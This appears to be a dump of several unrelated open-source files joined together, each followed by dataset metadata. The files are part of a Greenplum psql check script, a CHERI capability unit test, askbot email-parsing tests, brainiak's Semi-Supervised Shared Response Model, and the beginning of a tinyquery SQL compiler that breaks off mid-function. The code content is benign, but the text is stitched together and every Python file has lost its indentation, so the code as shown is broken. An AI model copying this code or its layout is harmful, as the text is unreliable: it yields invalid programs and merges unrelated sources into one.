def psql(sql, echo=False, quiet=True):
p = psql_open(sql, echo, quiet)
return psql_wait(p)
############
def pmap(func, jlist, numThreads = 16):
if (numThreads > len(jlist)):
numThreads = len(jlist)
inq = Queue.Queue(len(jlist))
for i in jlist: inq.put(i)
outq = Queue.Queue(len(jlist))
def work():
try:
while True:
outq.put((None, func(inq.get_nowait())))
except Queue.Empty: pass
except:
outq.put( (sys.exc_info(), None) )
# drain
try:
while True: inq.get_nowait()
except Queue.Empty: pass
thread = [threading.Thread(target=work) for i in xrange(numThreads)]
for t in thread: t.start()
for t in thread: t.join()
ret = []
try:
while True:
(ex, result) = outq.get_nowait()
if ex:
raise ex
ret.append(result)
except Queue.Empty: pass
return ret
############
def chk_not_analyzed():
print '-----------------------'
print 'LOOKING FOR TABLES NOT ANALYZED'
out = psql('''
SELECT ' * ' || nspname || '.' || relname
from pg_class, pg_namespace
where reltuples=0 and relpages=0 and relnamespace=pg_namespace.oid
and nspname not in ('information_schema','pg_aoseg',
'pg_bitmapindex', 'pg_catalog', 'pg_toast')
and relkind='r'
order by 1
''')
print ' %d object(s) found' % len(out)
print "".join(out)
############
def chk_users_without_resource_queues():
print '-----------------------'
print 'LOOKING FOR USERS WITHOUT RESOURCE QUEUES'
out = psql('''
SELECT ' * ' || rolname
from pg_roles
where rolresqueue is null and rolsuper='f'
order by 1
''')
print ' %d object(s) found' % len(out)
print "".join(out)
############
def chk_tables_with_big_skew():
print '-----------------------'
print 'LOOKING FOR TABLES WITH BIG SKEW'
out = psql('''
select ' '||max(c)||' ' ||min(c)||' '|| avg(c)||' '|| stddev(c)||' '|| (max(c) - min(c))/max(c) as p_diff_max_min
from (
select case when c is null then 0 else c end, gp_segment_id_present
from (select generate_series(0,79) as gp_segment_id_present ) t1
left outer join
(select count(*) as c, gp_segment_id from :table group by 2) t2
on t1.gp_segment_id_present =t2.gp_segment_id
) as data
''')
############
def chk_guc():
print '-----------------------'
print 'CHECKING GUCS'
out = psql('''
SELECT current_setting('lc_collate'),
current_setting('lc_monetary'),
current_setting('lc_numeric'),
current_setting('max_connections'),
current_setting('gp_fault_action'),
current_setting('work_mem')
''')
(lc_collate, lc_monetary, lc_numeric, max_connections,
gp_fault_action, work_mem) = out[0].strip().split('|')
print ' lc_collate =', lc_collate
print ' lc_monetary =', lc_monetary
print ' lc_numeric =', lc_numeric
print ' max_connections =', max_connections
print ' gp_fault_action =', gp_fault_action
print ' work_mem =', work_mem
############
def main():
parseCommandLine()
# set up env for psql
os.putenv("PGOPTIONS", '-c gp_session_role=utility')
os.putenv("PGDATABASE", GV.opt['-d'])
os.putenv("PGHOST", GV.opt['-h'])
os.putenv("PGPORT", GV.opt['-p'])
os.putenv("PGUSER", GV.opt['-U'])
# check for tables not analyzed
chk_not_analyzed()
# check for tables with significant skew
#chk_tables_with_big_skew()
# check for users not associated with any resource queues
chk_users_without_resource_queues()
# check for a few guc settings (e.g., hawq_re_memory_overcommit_max)
chk_guc()
if __name__ == '__main__':
main()
| apache-2.0 | -5,511,619,666,447,308,000 | 25.684564 | 113 | 0.554452 | false |
8l/beri | cheritest/trunk/tests/cp2/test_cp2_csdr_unpriv.py | 2 | 2103 | #-
# Copyright (c) 2011 Robert N. M. Watson
# All rights reserved.
#
# This software was developed by SRI International and the University of
# Cambridge Computer Laboratory under DARPA/AFRL contract FA8750-10-C-0237
# ("CTSRD"), as part of the DARPA CRASH research programme.
#
# @BERI_LICENSE_HEADER_START@
#
# Licensed to BERI Open Systems C.I.C. (BERI) under one or more contributor
# license agreements. See the NOTICE file distributed with this work for
# additional information regarding copyright ownership. BERI licenses this
# file to you under the BERI Hardware-Software License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.beri-open-systems.org/legal/license-1-0.txt
#
# Unless required by applicable law or agreed to in writing, Work distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# @BERI_LICENSE_HEADER_END@
#
from beritest_tools import BaseBERITestCase
from nose.plugins.attrib import attr
#
# Test csdr (store double word via capability, offset by register) with a
# constrained capability.
#
class test_cp2_csdr_unpriv(BaseBERITestCase):
@attr('capabilities')
def test_cp2_csdr_underflow(self):
'''Test that csdr did not write below constrained capability'''
self.assertRegisterEqual(self.MIPS.a0, 0x0, "csdr underflow with constrained capability")
@attr('capabilities')
def test_cp2_csdr_data(self):
'''Test that csdr wrote correctly via constrained capability'''
self.assertRegisterEqual(self.MIPS.a1, 0x0123456789abcdef, "csdr data written incorrectly with constrained capability")
@attr('capabilities')
def test_cp2_csdr_overflow(self):
'''Test that csdr did not write above constrained capability'''
self.assertRegisterEqual(self.MIPS.a2, 0x0, "csdr overflow with constrained capability")
| apache-2.0 | 387,148,937,092,373,300 | 41.06 | 127 | 0.748455 | false |
PearsonIOKI/compose-forum | askbot/tests/email_parsing_tests.py | 3 | 3845 | # -*- coding: utf-8 -*-
from django.conf import settings as django_settings
from django.template import Context
from django.template.loader import get_template
from askbot import mail
from askbot import models
from askbot.tests import utils
from askbot.utils.html import get_text_from_html
class EmailParsingTests(utils.AskbotTestCase):
def setUp(self):
self.template_name = 'email/welcome_lamson_on.html'
self.context = {'site_name': 'askbot.com',
'email_code': 'DwFwndQty'}
template = get_template(self.template_name)
self.rendered_template = template.render(Context(self.context))
self.expected_output = 'Welcome to askbot.com!\n\nImportant: Please reply to this message, without editing it. We need this to determine your email signature and that the email address is valid and was typed correctly.\n\nUntil we receive the response from you, you will not be able ask or answer questions on askbot.com by email.\n\nSincerely,askbot.com Administrator\n\nDwFwndQty'
def test_gmail_rich_text_response_stripped(self):
text = u'\n\nthis is my reply!\n\nOn Wed, Oct 31, 2012 at 1:45 AM, <[email protected]> wrote:\n\n> **\n> '
self.assertEqual(mail.extract_reply(text), 'this is my reply!')
def test_gmail_plain_text_response_stripped(self):
text = u'\n\nthis is my another reply!\n\nOn Wed, Oct 31, 2012 at 1:45 AM, <[email protected]> wrote:\n>\n> '
self.assertEqual(mail.extract_reply(text), 'this is my another reply!')
def test_yahoo_mail_response_stripped(self):
text = u'\n\nthis is my reply!\n\n\n\n________________________________\n From: "[email protected]" <[email protected]>\nTo: [email protected] \nSent: Wednesday, October 31, 2012 2:41 AM\nSubject: "This is my test question"\n \n\n \n \n \n'
self.assertEqual(mail.extract_reply(text), 'this is my reply!')
def test_kmail_plain_text_response_stripped(self):
text = u'On Monday 01 October 2012 21:22:44 you wrote: \n\nthis is my reply!'
self.assertEqual(mail.extract_reply(text), 'this is my reply!')
def test_outlook_com_with_rtf_response_stripped(self):
text = u'outlook.com (new hotmail) with RTF on \n\nSubject: "Posting a question by email." \nFrom: [email protected] \nTo: [email protected] \nDate: Thu, 1 Nov 2012 16:30:27 +0000'
self.assertEqual(
mail.extract_reply(text),
'outlook.com (new hotmail) with RTF on'
)
self.assertEqual(
mail.extract_reply(text),
'outlook.com (new hotmail) with RTF on'
)
def test_outlook_com_plain_text_response_stripped(self):
text = u'reply from hotmail without RTF \n________________________________ \n> Subject: "test with recovered signature" \n> From: [email protected] \n> To: [email protected] \n> Date: Thu, 1 Nov 2012 16:44:35 +0000'
self.assertEqual(
mail.extract_reply(text),
u'reply from hotmail without RTF'
)
def test_outlook_desktop1(self):
text = """some real text
-----Original Message-----
From: [email protected] [mailto:[email protected]]
Sent: Wednesday, August 07, 2013 11:00 AM
To: Jane Doe
Subject: "One more test question from email."
"""
self.assertEqual(mail.extract_reply(text), "some real text")
def test_blackberry(self):
text = """Lorem ipsum lorem ipsum
blah blah blah
some more text here
Joe
________________________________________
From: [email protected]
Sent: Thursday, August 15, 2013 1:58:21 AM
To: Mister Joe
Subject: Our forum: "some text in the subject line"
"""
expected = """Lorem ipsum lorem ipsum
blah blah blah
some more text here
Joe"""
self.assertEqual(mail.extract_reply(text), expected)
| gpl-3.0 | -2,865,255,889,403,725,000 | 43.183908 | 390 | 0.654787 | false |
mihaic/brainiak | brainiak/funcalign/sssrm.py | 1 | 29553 | # Copyright 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Semi-Supervised Shared Response Model (SS-SRM)
The implementations are based on the following publications:
.. [Turek2016] "A Semi-Supervised Method for Multi-Subject fMRI Functional
Alignment",
J. S. Turek, T. L. Willke, P.-H. Chen, P. J. Ramadge
IEEE International Conference on Acoustics, Speech and Signal Processing
(ICASSP), 2017, pp. 1098-1102.
https://doi.org/10.1109/ICASSP.2017.7952326
"""
# Authors: Javier Turek (Intel Labs), 2016
import logging
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin, ClassifierMixin
from sklearn.utils import assert_all_finite
from sklearn.utils.validation import NotFittedError
from sklearn.utils.multiclass import unique_labels
import theano
import theano.tensor as T
import theano.compile.sharedvalue as S
from pymanopt.manifolds import Euclidean
from pymanopt.manifolds import Product
from pymanopt.solvers import ConjugateGradient
from pymanopt import Problem
from pymanopt.manifolds import Stiefel
import gc
from brainiak.utils import utils
from brainiak.funcalign import srm
__all__ = [
"SSSRM",
]
logger = logging.getLogger(__name__)
# FIXME workaround for Theano failure on macOS Conda builds
# https://travis-ci.org/github/brainiak/brainiak/jobs/689445834#L1414
# Inspired by workaround from PyMC3
# https://github.com/pymc-devs/pymc3/pull/3767
theano.config.gcc.cxxflags = "-Wno-c++11-narrowing"
class SSSRM(BaseEstimator, ClassifierMixin, TransformerMixin):
"""Semi-Supervised Shared Response Model (SS-SRM)
Given multi-subject data, factorize it as a shared response S among all
subjects and an orthogonal transform W per subject, using also labeled
data to train a Multinomial Logistic Regression (MLR) classifier (with
l2 regularization) in a semi-supervised manner:
.. math::
(1-\\alpha) Loss_{SRM}(W_i,S;X_i)
+ \\alpha/\\gamma Loss_{MLR}(\\theta, bias; {(W_i^T \\times Z_i, y_i})
+ R(\\theta)
:label: sssrm-eq
(see Equations (1) and (4) in [Turek2016]_).
Parameters
----------
n_iter : int, default: 10
Number of iterations to run the algorithm.
features : int, default: 50
Number of features to compute.
gamma : float, default: 1.0
Regularization parameter for the classifier.
alpha : float, default: 0.5
Balance parameter between the SRM term and the MLR term.
rand_seed : int, default: 0
Seed for initializing the random number generator.
Attributes
----------
w_ : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) for each subject.
s_ : array, shape=[features, samples]
The shared response.
theta_ : array, shape=[classes, features]
The MLR class plane parameters.
bias_ : array, shape=[classes]
The MLR class biases.
classes_ : array of int, shape=[classes]
Mapping table for each classes to original class label.
random_state_: `RandomState`
Random number generator initialized using rand_seed
Note
----
The number of voxels may be different between subjects. However, the
number of samples for the alignment data must be the same across
subjects. The number of labeled samples per subject can be different.
The Semi-Supervised Shared Response Model is approximated using the
Block-Coordinate Descent (BCD) algorithm proposed in [Turek2016]_.
This is a single node version.
"""
def __init__(self, n_iter=10, features=50, gamma=1.0, alpha=0.5,
rand_seed=0):
self.n_iter = n_iter
self.features = features
self.gamma = gamma
self.alpha = alpha
self.rand_seed = rand_seed
return
def fit(self, X, y, Z):
"""Compute the Semi-Supervised Shared Response Model
Parameters
----------
X : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
y : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in Z.
Z : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject
for training the MLR classifier.
"""
logger.info('Starting SS-SRM')
# Check that the alpha value is in range (0.0,1.0)
if 0.0 >= self.alpha or self.alpha >= 1.0:
raise ValueError("Alpha parameter should be in range (0.0, 1.0)")
# Check that the regularizer value is positive
if 0.0 >= self.gamma:
raise ValueError("Gamma parameter should be positive.")
# Check the number of subjects
if len(X) <= 1 or len(y) <= 1 or len(Z) <= 1:
raise ValueError("There are not enough subjects in the input "
"data to train the model.")
if not (len(X) == len(y)) or not (len(X) == len(Z)):
raise ValueError("Different number of subjects in data.")
# Check for input data sizes
if X[0].shape[1] < self.features:
raise ValueError(
"There are not enough samples to train the model with "
"{0:d} features.".format(self.features))
# Check if all subjects have same number of TRs for alignment
# and if alignment and classification data have the same number of
# voxels per subject. Also check that there labels for all the classif.
# sample
number_trs = X[0].shape[1]
number_subjects = len(X)
for subject in range(number_subjects):
assert_all_finite(X[subject])
assert_all_finite(Z[subject])
if X[subject].shape[1] != number_trs:
raise ValueError("Different number of alignment samples "
"between subjects.")
if X[subject].shape[0] != Z[subject].shape[0]:
raise ValueError("Different number of voxels between alignment"
" and classification data (subject {0:d})"
".".format(subject))
if Z[subject].shape[1] != y[subject].size:
raise ValueError("Different number of samples and labels in "
"subject {0:d}.".format(subject))
# Map the classes to [0..C-1]
new_y = self._init_classes(y)
# Run SS-SRM
self.w_, self.s_, self.theta_, self.bias_ = self._sssrm(X, Z, new_y)
return self
def _init_classes(self, y):
"""Map all possible classes to the range [0,..,C-1]
Parameters
----------
y : list of arrays of int, each element has shape=[samples_i,]
Labels of the samples for each subject
Returns
-------
new_y : list of arrays of int, each element has shape=[samples_i,]
Mapped labels of the samples for each subject
Note
----
The mapping of the classes is saved in the attribute classes_.
"""
self.classes_ = unique_labels(utils.concatenate_not_none(y))
new_y = [None] * len(y)
for s in range(len(y)):
new_y[s] = np.digitize(y[s], self.classes_) - 1
return new_y
def transform(self, X, y=None):
"""Use the model to transform matrix to Shared Response space
Parameters
----------
X : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject
note that number of voxels and samples can vary across subjects.
y : not used as it only applies the mappings
Returns
-------
s : list of 2D arrays, element i has shape=[features_i, samples_i]
Shared responses from input data (X)
"""
# Check if the model exist
if hasattr(self, 'w_') is False:
raise NotFittedError("The model fit has not been run yet.")
# Check the number of subjects
if len(X) != len(self.w_):
raise ValueError("The number of subjects does not match the one"
" in the model.")
s = [None] * len(X)
for subject in range(len(X)):
s[subject] = self.w_[subject].T.dot(X[subject])
return s
def predict(self, X):
"""Classify the output for given data
Parameters
----------
X : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject
The number of voxels should be according to each subject at
the moment of training the model.
Returns
-------
p: list of arrays, element i has shape=[samples_i]
Predictions for each data sample.
"""
# Check if the model exist
if hasattr(self, 'w_') is False:
raise NotFittedError("The model fit has not been run yet.")
# Check the number of subjects
if len(X) != len(self.w_):
raise ValueError("The number of subjects does not match the one"
" in the model.")
X_shared = self.transform(X)
p = [None] * len(X_shared)
for subject in range(len(X_shared)):
sumexp, _, exponents = utils.sumexp_stable(
self.theta_.T.dot(X_shared[subject]) + self.bias_)
p[subject] = self.classes_[
(exponents / sumexp[np.newaxis, :]).argmax(axis=0)]
return p
def _sssrm(self, data_align, data_sup, labels):
"""Block-Coordinate Descent algorithm for fitting SS-SRM.
Parameters
----------
data_align : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
data_sup : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
Returns
-------
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
s : array, shape=[features, samples]
The shared response.
"""
classes = self.classes_.size
# Initialization:
self.random_state_ = np.random.RandomState(self.rand_seed)
random_states = [
np.random.RandomState(self.random_state_.randint(2**32))
for i in range(len(data_align))]
# Set Wi's to a random orthogonal voxels by TRs
w, _ = srm._init_w_transforms(data_align, self.features, random_states)
# Initialize the shared response S
s = SSSRM._compute_shared_response(data_align, w)
# Initialize theta and bias
theta, bias = self._update_classifier(data_sup, labels, w, classes)
# calculate and print the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup, labels,
w, s, theta, bias)
logger.info('Objective function %f' % objective)
# Main loop:
for iteration in range(self.n_iter):
logger.info('Iteration %d' % (iteration + 1))
# Update the mappings Wi
w = self._update_w(data_align, data_sup, labels, w, s, theta, bias)
# Output the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup,
labels, w, s, theta, bias)
logger.info('Objective function after updating Wi %f'
% objective)
# Update the shared response S
s = SSSRM._compute_shared_response(data_align, w)
# Output the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup,
labels, w, s, theta, bias)
logger.info('Objective function after updating S %f'
% objective)
# Update the MLR classifier, theta and bias
theta, bias = self._update_classifier(data_sup, labels, w, classes)
# Output the objective function
if logger.isEnabledFor(logging.INFO):
objective = self._objective_function(data_align, data_sup,
labels, w, s, theta, bias)
logger.info('Objective function after updating MLR %f'
% objective)
return w, s, theta, bias
def _update_classifier(self, data, labels, w, classes):
"""Update the classifier parameters theta and bias
Parameters
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
w : list of 2D array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
classes : int
The number of classes in the classifier.
Returns
-------
theta : array, shape=[features, classes]
The MLR parameter for the class planes.
bias : array shape=[classes,]
The MLR parameter for class biases.
"""
# Stack the data and labels for training the classifier
data_stacked, labels_stacked, weights = \
SSSRM._stack_list(data, labels, w)
features = w[0].shape[1]
total_samples = weights.size
data_th = S.shared(data_stacked.astype(theano.config.floatX))
val_ = S.shared(labels_stacked)
total_samples_S = S.shared(total_samples)
theta_th = T.matrix(name='theta', dtype=theano.config.floatX)
bias_th = T.col(name='bias', dtype=theano.config.floatX)
constf2 = S.shared(self.alpha / self.gamma, allow_downcast=True)
weights_th = S.shared(weights)
log_p_y_given_x = \
T.log(T.nnet.softmax((theta_th.T.dot(data_th.T)).T + bias_th.T))
f = -constf2 * T.sum((log_p_y_given_x[T.arange(total_samples_S), val_])
/ weights_th) + 0.5 * T.sum(theta_th ** 2)
manifold = Product((Euclidean(features, classes),
Euclidean(classes, 1)))
problem = Problem(manifold=manifold, cost=f, arg=[theta_th, bias_th],
verbosity=0)
solver = ConjugateGradient(mingradnorm=1e-6)
solution = solver.solve(problem)
theta = solution[0]
bias = solution[1]
del constf2
del theta_th
del bias_th
del data_th
del val_
del solver
del solution
return theta, bias
def _update_w(self, data_align, data_sup, labels, w, s, theta, bias):
"""
Parameters
----------
data_align : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
data_sup : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
s : array, shape=[features, samples]
The shared response.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
w : list of 2D array, element i has shape=[voxels_i, features]
The updated orthogonal transforms (mappings).
"""
subjects = len(data_align)
s_th = S.shared(s.astype(theano.config.floatX))
theta_th = S.shared(theta.T.astype(theano.config.floatX))
bias_th = S.shared(bias.T.astype(theano.config.floatX),
broadcastable=(True, False))
for subject in range(subjects):
logger.info('Subject Wi %d' % subject)
# Solve for subject i
# Create the theano function
w_th = T.matrix(name='W', dtype=theano.config.floatX)
data_srm_subject = \
S.shared(data_align[subject].astype(theano.config.floatX))
constf1 = \
S.shared((1 - self.alpha) * 0.5 / data_align[subject].shape[1],
allow_downcast=True)
f1 = constf1 * T.sum((data_srm_subject - w_th.dot(s_th))**2)
if data_sup[subject] is not None:
lr_samples_S = S.shared(data_sup[subject].shape[1])
data_sup_subject = \
S.shared(data_sup[subject].astype(theano.config.floatX))
labels_S = S.shared(labels[subject])
constf2 = S.shared(-self.alpha / self.gamma
/ data_sup[subject].shape[1],
allow_downcast=True)
log_p_y_given_x = T.log(T.nnet.softmax((theta_th.dot(
w_th.T.dot(data_sup_subject))).T + bias_th))
f2 = constf2 * T.sum(
log_p_y_given_x[T.arange(lr_samples_S), labels_S])
f = f1 + f2
else:
f = f1
# Define the problem and solve
f_subject = self._objective_function_subject(data_align[subject],
data_sup[subject],
labels[subject],
w[subject],
s, theta, bias)
minstep = np.amin(((10**-np.floor(np.log10(f_subject))), 1e-1))
manifold = Stiefel(w[subject].shape[0], w[subject].shape[1])
problem = Problem(manifold=manifold, cost=f, arg=w_th, verbosity=0)
solver = ConjugateGradient(mingradnorm=1e-2, minstepsize=minstep)
w[subject] = np.array(solver.solve(
problem, x=w[subject].astype(theano.config.floatX)))
if data_sup[subject] is not None:
del f2
del log_p_y_given_x
del data_sup_subject
del labels_S
del solver
del problem
del manifold
del f
del f1
del data_srm_subject
del w_th
del theta_th
del bias_th
del s_th
# Run garbage collector to avoid filling up the memory
gc.collect()
return w
@staticmethod
def _compute_shared_response(data, w):
""" Compute the shared response S
Parameters
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples]
Each element in the list contains the fMRI data of one subject.
w : list of 2D arrays, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
Returns
-------
s : array, shape=[features, samples]
The shared response for the subjects data with the mappings in w.
"""
s = np.zeros((w[0].shape[1], data[0].shape[1]))
for m in range(len(w)):
s = s + w[m].T.dot(data[m])
s /= len(w)
return s
def _objective_function(self, data_align, data_sup, labels, w, s, theta,
bias):
"""Compute the objective function of the Semi-Supervised SRM
See :eq:`sssrm-eq`.
Parameters
----------
data_align : list of 2D arrays, element i has shape=[voxels_i, n_align]
Each element in the list contains the fMRI data for alignment of
one subject. There are n_align samples for each subject.
data_sup : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the data samples
in data_sup.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
s : array, shape=[features, samples]
The shared response.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
f_val : float
The SS-SRM objective function evaluated based on the parameters to
this function.
"""
subjects = len(data_align)
# Compute the SRM loss
f_val = 0.0
for subject in range(subjects):
samples = data_align[subject].shape[1]
f_val += (1 - self.alpha) * (0.5 / samples) \
* np.linalg.norm(data_align[subject] - w[subject].dot(s),
'fro')**2
# Compute the MLR loss
f_val += self._loss_lr(data_sup, labels, w, theta, bias)
return f_val
def _objective_function_subject(self, data_align, data_sup, labels, w, s,
theta, bias):
"""Compute the objective function for one subject.
.. math:: (1-C)*Loss_{SRM}_i(W_i,S;X_i)
.. math:: + C/\\gamma * Loss_{MLR_i}(\\theta, bias; {(W_i^T*Z_i, y_i})
.. math:: + R(\\theta)
Parameters
----------
data_align : 2D array, shape=[voxels_i, samples_align]
Contains the fMRI data for alignment of subject i.
data_sup : 2D array, shape=[voxels_i, samples_i]
Contains the fMRI data of one subject for the classification task.
labels : array of int, shape=[samples_i]
The labels for the data samples in data_sup.
w : array, shape=[voxels_i, features]
The orthogonal transform (mapping) :math:`W_i` for subject i.
s : array, shape=[features, samples]
The shared response.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
f_val : float
The SS-SRM objective function for subject i evaluated on the
parameters to this function.
"""
# Compute the SRM loss
f_val = 0.0
samples = data_align.shape[1]
f_val += (1 - self.alpha) * (0.5 / samples) \
* np.linalg.norm(data_align - w.dot(s), 'fro')**2
# Compute the MLR loss
f_val += self._loss_lr_subject(data_sup, labels, w, theta, bias)
return f_val
def _loss_lr_subject(self, data, labels, w, theta, bias):
"""Compute the Loss MLR for a single subject (without regularization)
Parameters
----------
data : array, shape=[voxels, samples]
The fMRI data of subject i for the classification task.
labels : array of int, shape=[samples]
The labels for the data samples in data.
w : array, shape=[voxels, features]
The orthogonal transform (mapping) :math:`W_i` for subject i.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
loss : float
The loss MLR for the subject
"""
if data is None:
return 0.0
samples = data.shape[1]
thetaT_wi_zi_plus_bias = theta.T.dot(w.T.dot(data)) + bias
sum_exp, max_value, _ = utils.sumexp_stable(thetaT_wi_zi_plus_bias)
sum_exp_values = np.log(sum_exp) + max_value
aux = 0.0
for sample in range(samples):
label = labels[sample]
aux += thetaT_wi_zi_plus_bias[label, sample]
return self.alpha / samples / self.gamma * (sum_exp_values.sum() - aux)
def _loss_lr(self, data, labels, w, theta, bias):
"""Compute the Loss MLR (with the regularization)
Parameters
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the samples in
data.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
theta : array, shape=[classes, features]
The MLR class plane parameters.
bias : array, shape=[classes]
The MLR class biases.
Returns
-------
loss : float
The loss MLR for the SS-SRM model
"""
subjects = len(data)
loss = 0.0
for subject in range(subjects):
if labels[subject] is not None:
loss += self._loss_lr_subject(data[subject], labels[subject],
w[subject], theta, bias)
return loss + 0.5 * np.linalg.norm(theta, 'fro')**2
@staticmethod
def _stack_list(data, data_labels, w):
"""Construct a numpy array by stacking arrays in a list
Parameter
----------
data : list of 2D arrays, element i has shape=[voxels_i, samples_i]
Each element in the list contains the fMRI data of one subject for
the classification task.
data_labels : list of arrays of int, element i has shape=[samples_i]
Each element in the list contains the labels for the samples in
data.
w : list of array, element i has shape=[voxels_i, features]
The orthogonal transforms (mappings) :math:`W_i` for each subject.
Returns
-------
data_stacked : 2D array, shape=[samples, features]
The data samples from all subjects are stacked into a single
2D array, where "samples" is the sum of samples_i.
labels_stacked : array, shape=[samples,]
The labels from all subjects are stacked into a single
array, where "samples" is the sum of samples_i.
weights : array, shape=[samples,]
The number of samples of the subject that are related to that
sample. They become a weight per sample in the MLR loss.
"""
labels_stacked = utils.concatenate_not_none(data_labels)
weights = np.empty((labels_stacked.size,))
data_shared = [None] * len(data)
curr_samples = 0
for s in range(len(data)):
if data[s] is not None:
subject_samples = data[s].shape[1]
curr_samples_end = curr_samples + subject_samples
weights[curr_samples:curr_samples_end] = subject_samples
data_shared[s] = w[s].T.dot(data[s])
curr_samples += data[s].shape[1]
data_stacked = utils.concatenate_not_none(data_shared, axis=1).T
return data_stacked, labels_stacked, weights
| apache-2.0 | -7,022,321,390,158,036,000 | 34.77845 | 79 | 0.571854 | false |
Khan/tinyquery | tinyquery/compiler.py | 1 | 29283 | """The compiler step turns an AST into a planned query.
This step has a number of responsibilities:
-Validate that the expression is well-typed.
-Resolve all select fields to their aliases and types.
"""
from __future__ import absolute_import
import collections
import itertools
from tinyquery import exceptions
from tinyquery import parser
from tinyquery import runtime
from tinyquery import tq_ast
from tinyquery import typed_ast
from tinyquery import type_context
from tinyquery import tq_types
def compile_text(text, tables_by_name):
ast = parser.parse_text(text)
return Compiler(tables_by_name).compile_select(ast)
class Compiler(object):
def __init__(self, tables_by_name):
self.tables_by_name = tables_by_name
def compile_select(self, select):
assert isinstance(select, tq_ast.Select)
table_expr = self.compile_table_expr(select.table_expr)
table_ctx = table_expr.type_ctx
where_expr = self.compile_filter_expr(select.where_expr, table_ctx)
select_fields = self.expand_select_fields(select.select_fields,
table_expr)
aliases = self.get_aliases(select_fields)
within_clauses = self.get_within_clauses(select_fields)
group_set = self.compile_groups(select.groups, select_fields, aliases,
table_ctx)
compiled_field_dict, aggregate_context = self.compile_group_fields(
select_fields, aliases, within_clauses, group_set, table_ctx)
is_scoped_aggregation = any(
clause is not None for clause in within_clauses)
# Implicit columns can only show up in non-aggregate select fields.
implicit_column_context = self.find_used_column_context(
compiled_field_dict.values())
for alias, within_clause, select_field in zip(aliases, within_clauses,
select_fields):
if group_set is not None and alias not in group_set.alias_groups:
if is_scoped_aggregation is False:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause,
aggregate_context)
else:
aggregate_context_not_within = (
aggregate_context.aggregate_context)
if select_field.within_record is not None:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause,
aggregate_context)
else:
compiled_field_dict[alias] = self.compile_select_field(
select_field.expr, alias, within_clause,
aggregate_context_not_within)
# Put the compiled select fields in the proper order.
select_fields = [compiled_field_dict[alias] for alias in aliases]
result_context = type_context.TypeContext.from_table_and_columns(
None,
collections.OrderedDict(
(field.alias, field.expr.type) for field in select_fields),
implicit_column_context=implicit_column_context)
having_expr = self.compile_filter_expr(select.having_expr,
result_context)
return typed_ast.Select(select_fields, table_expr, where_expr,
group_set, having_expr, select.orderings,
select.limit, result_context)
def expand_select_fields(self, select_fields, table_expr):
"""Expand any stars into a list of all context columns.
Arguments:
select_fields: A list of uncompiled select fields, some of which
can be tq_ast.Star.
table_expr: The compiled table expression to reference, if
necessary.
"""
table_ctx = table_expr.type_ctx
star_select_fields = []
for table_name, col_name in table_ctx.columns:
if table_name is not None:
col_ref = table_name + '.' + col_name
else:
col_ref = col_name
